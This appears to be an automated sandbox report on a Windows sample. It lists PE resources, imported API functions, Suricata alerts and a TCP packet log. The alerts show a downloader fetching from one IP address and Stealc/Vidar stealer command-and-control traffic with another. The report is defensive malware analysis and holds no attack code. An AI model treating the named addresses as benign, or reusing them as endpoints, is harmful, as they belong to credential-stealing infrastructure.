RT_BITMAP	0x398b20	0xa6a	Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m	English	United States	0.21680420105026257
RT_BITMAP	0x39958c	0x152	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors	English	United States	0.5295857988165681
RT_BITMAP	0x3996e0	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.4875478927203065
RT_ICON	0x399f08	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.07422059518186112
RT_ICON	0x39e130	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08703319502074688
RT_ICON	0x3a06d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.16463414634146342
RT_ICON	0x3a1780	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.18565573770491803
RT_ICON	0x3a2108	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3262411347517731
RT_DIALOG	0x3a2570	0xac	data	English	United States	0.7151162790697675
RT_DIALOG	0x3a261c	0xcc	data	English	United States	0.6911764705882353
RT_DIALOG	0x3a26e8	0x1b4	data	English	United States	0.5458715596330275
RT_DIALOG	0x3a289c	0x136	data	English	United States	0.6064516129032258
RT_DIALOG	0x3a29d4	0x4c	data	English	United States	0.8289473684210527
RT_STRING	0x3a2a20	0x234	data	English	United States	0.4645390070921986
RT_STRING	0x3a2c54	0x182	data	English	United States	0.5103626943005182
RT_STRING	0x3a2dd8	0x50	data	English	United States	0.7375
RT_STRING	0x3a2e28	0x9a	data	English	United States	0.37662337662337664
RT_STRING	0x3a2ec4	0x2f6	data	English	United States	0.449868073878628
RT_STRING	0x3a31bc	0x5c0	data	English	United States	0.3498641304347826
RT_STRING	0x3a377c	0x434	data	English	United States	0.32899628252788105
RT_STRING	0x3a3bb0	0x100	data	English	United States	0.5703125
RT_STRING	0x3a3cb0	0x484	data	English	United States	0.39186851211072665
RT_STRING	0x3a4134	0x1ea	data	English	United States	0.44081632653061226
RT_STRING	0x3a4320	0x18a	data	English	United States	0.5228426395939086
RT_STRING	0x3a44ac	0x216	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.46254681647940077
RT_STRING	0x3a46c4	0x624	data	English	United States	0.3575063613231552
RT_STRING	0x3a4ce8	0x660	data	English	United States	0.3474264705882353
RT_STRING	0x3a5348	0x41a	data	English	United States	0.38095238095238093
RT_GROUP_ICON	0x3a5764	0x4c	data	English	United States	0.8026315789473685
RT_VERSION	0x3a57b0	0x2c4	data	English	United States	0.461864406779661
RT_HTML	0x3a5a74	0x3835	ASCII text, with very long lines (443), with CRLF line terminators	English	United States	0.08298005420807561
RT_HTML	0x3a92ac	0x1316	ASCII text, with CRLF line terminators	English	United States	0.18399508800654932
RT_HTML	0x3aa5c4	0x8c77	HTML document, ASCII text, with CRLF line terminators	English	United States	0.08081426068578103
RT_HTML	0x3b323c	0x6acd	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10679931238798873
RT_HTML	0x3b9d0c	0x679	HTML document, ASCII text, with CRLF line terminators	English	United States	0.34339167169583584
RT_HTML	0x3ba388	0x104a	HTML document, ASCII text, with CRLF line terminators	English	United States	0.2170263788968825
RT_HTML	0x3bb3d4	0x15b1	HTML document, ASCII text, with CRLF line terminators	English	United States	0.17612101566720692
RT_HTML	0x3bc988	0x2099	exported SGML document, ASCII text, with very long lines (659), with CRLF line terminators	English	United States	0.13732774116237267
RT_HTML	0x3bea24	0x368d	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10834228428213391
RT_HTML	0x3c20b4	0x1d7	ASCII text, with CRLF line terminators	English	United States	0.6008492569002123
RT_MANIFEST	0x3c228c	0x813	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.41025641025641024

Imports

DLL

Import

KERNEL32.dll

WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CloseHandle, GetLogicalDriveStringsW, GetDriveTypeW, GetDiskFreeSpaceExW, Sleep, LoadLibraryExW, FreeLibrary, GetCurrentProcess, WideCharToMultiByte, GetSystemDirectoryW, GetCurrentProcessId, DecodePointer, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CreateNamedPipeW, GetExitCodeThread, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, CompareStringW, FindNextFileW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, CreateSemaphoreW, ReleaseSemaphore, GlobalMemoryStatus, GetModuleHandleA, GetProcessAffinityMask, CreateThread, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, OutputDebugStringW, GetLocalTime, FlushFileBuffers, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, FormatMessageW, ConnectNamedPipe, GetEnvironmentStringsW, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, lstrcpyW, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, FormatMessageA, QueryPerformanceCounter, QueryPerformanceFrequency, SleepConditionVariableSRW, GetLocaleInfoEx, FindFirstFileExW, MoveFileExW, WakeAllConditionVariable, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetConsoleMode, SetFilePointerEx, GetFileSizeEx, ReadConsoleW, GetTimeZoneInformation, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW, CreateFileW, HeapQueryInformation

imagehlp.dll

SymGetModuleBase, SymFunctionTableAccess, SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, StackWalk

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T21:50:12.116816+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49710	45.130.41.93	80	TCP
2024-12-05T21:50:12.116816+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49710	45.130.41.93	80	TCP
2024-12-05T21:51:43.653462+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.212.196	443	192.168.2.5	49903	TCP
2024-12-05T21:51:45.936132+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49909	5.75.212.196	443	TCP
2024-12-05T21:51:45.936317+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.212.196	443	192.168.2.5	49909	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 21:50:10.651335955 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:10.771210909 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:10.771302938 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:10.896989107 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:11.017065048 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.116749048 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.116806984 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.116816044 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.116817951 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.116864920 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.116947889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.116961956 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.116974115 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.116986990 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.117001057 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.117019892 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.117280006 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.117300034 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.117311954 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.117353916 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.236689091 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.236748934 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.236917019 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.236958027 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.240869999 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.240889072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.240926027 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.240951061 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.356504917 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.356638908 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.360577106 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.360594988 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.360646963 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.360687017 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.360843897 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476465940 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476488113 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476500988 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476512909 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476521969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476526022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476538897 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476542950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476552963 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476566076 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476574898 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476577044 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476589918 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476602077 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476625919 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476798058 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476809978 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476820946 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476834059 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476844072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476845980 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476872921 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476891041 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476893902 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476905107 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476917028 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476923943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476928949 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476938963 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476943016 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.476963997 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.476986885 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.500591993 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.500641108 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.500801086 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.500849009 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.502861977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.502907038 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.502962112 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.503043890 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.510540009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.510584116 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.510698080 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.510791063 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.518120050 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.518171072 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.518254042 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.518301010 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.596496105 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.596550941 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.596587896 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.596649885 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.600266933 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.600315094 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.600343943 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.600436926 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.607914925 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.607975006 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.608031988 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.608139038 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.615535021 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.615586996 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.615647078 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.615703106 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.622701883 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.622879982 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.622924089 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.629683971 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.629734039 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.629764080 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.629834890 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.636694908 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.636823893 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.636872053 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.642692089 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.642745972 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.642785072 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.648643970 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.648727894 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.648788929 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.654612064 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.654712915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.654772997 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.660587072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.660701036 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.660763025 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.666541100 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.666598082 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.666637897 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.666677952 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.672518015 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.672573090 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.672636986 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.672729969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.678591967 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.678612947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.678633928 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.678647995 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.684478998 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.684533119 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.684564114 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.684604883 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.690459013 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.690516949 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.690566063 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.696449995 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.696497917 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.696571112 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.696671009 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.702370882 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.702450037 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.702454090 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.702493906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.708365917 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.708425045 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.716244936 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.716281891 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.716303110 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.716326952 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.719181061 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.719233990 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.719309092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.719374895 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.725199938 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.725263119 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.725334883 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.725383997 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.731091976 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.731170893 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.731206894 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.731554031 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.736990929 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.737132072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.737153053 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.737229109 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.742887974 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.742995977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.743088007 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.748788118 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.748908997 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.748972893 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.754753113 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.754807949 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.754832983 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.754987955 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.760602951 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.760703087 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.760726929 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.760850906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.766474009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.766539097 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.766557932 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.766602993 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.773020983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.773118973 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.773143053 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.773307085 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.777066946 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.777151108 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.777178049 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.777329922 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.781634092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.781723022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.781747103 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.781914949 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.785770893 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.785880089 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.785904884 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.786092997 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.789920092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.789977074 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.789998055 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.790060997 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.793922901 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.793975115 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.793977976 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.794368982 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.797916889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.798032045 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.798051119 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.798296928 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.801953077 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.802093029 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.803059101 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.805917025 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.806070089 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.808459044 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.809926987 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.810015917 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.810044050 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.810591936 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.813915968 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.814023972 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.814047098 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.818237066 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.836184978 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.836241961 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.836265087 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.836309910 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.838009119 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.838128090 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.838190079 CET	49710	80	192.168.2.5	45.130.41.93
